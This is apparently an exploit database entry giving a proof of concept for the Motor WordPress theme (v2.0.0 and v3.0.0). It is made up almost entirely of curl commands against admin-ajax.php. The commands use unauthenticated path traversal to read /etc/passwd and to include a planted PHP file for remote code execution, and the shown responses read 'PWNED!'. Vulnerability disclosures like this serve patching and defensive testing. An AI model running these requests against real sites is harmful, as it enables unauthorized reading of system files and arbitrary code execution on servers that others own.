## https://sploitus.com/exploit?id=WPEX-ID:D9518429-79D3-4B13-88FF-3722D05EFA9F
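# Remote file access (path traversal through the `file` form field; the requests below carry no cookies or other credentials):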

# Motor theme v2.0.0:
% curl -i -F 'file=../../../../../../etc/passwd' -F 'action=motor_load_more' localhost:8888/wp-admin/admin-ajax.php
% curl -i -F 'file=../../../../../../etc/passwd' -F 'action=motor_gallery_load_more' localhost:8888/wp-admin/admin-ajax.php
% curl -i -F 'file=../../../../../../etc/passwd' -F 'action=motor_quick_view' 'localhost:8888/wp-admin/admin-ajax.php?product_id=42'

# Motor theme v3.0.0:
% curl -i -F 'file=/etc/passwd' -F 'action=motor_load_more' localhost:8888/wp-admin/admin-ajax.php

# Remote code execution

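Precondition: a file malicious.php with the following content exists somewhere on the server's file system: <?php echo 'PWNED!' ?>
The responses below contain the script's output rather than its source, so the `file` value is evidently evaluated as PHP (presumably through an include/require call) and not merely read. The two v3.0.0 requests that omit `.php` suggest those actions append the extension themselves.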

PoC:
# Motor theme v2.0.0:
% curl -F 'file=../../../malicious.php' -F 'action=motor_load_more' 'localhost:8888/wp-admin/admin-ajax.php'
PWNED!

% curl -F 'file=../../../malicious.php' -F 'action=motor_gallery_load_more' 'localhost:8888/wp-admin/admin-ajax.php'
PWNED!

% curl -F 'file=../../../malicious.php' -F 'action=motor_quick_view' 'localhost:8888/wp-admin/admin-ajax.php?product_id=42'
PWNED!

# Motor theme v3.0.0:
% curl -F 'file=../../../malicious.php' -F 'action=motor_load_more' 'localhost:8888/wp-admin/admin-ajax.php'
PWNED!

% curl -F 'file=../../../malicious' -F 'action=motor_quick_view' 'localhost:8888/wp-admin/admin-ajax.php?product_id=42'
PWNED!

% curl -F 'file=../../../malicious' -F 'action=motor_project_quick_view' 'localhost:8888/wp-admin/admin-ajax.php?project_id=42'
PWNED!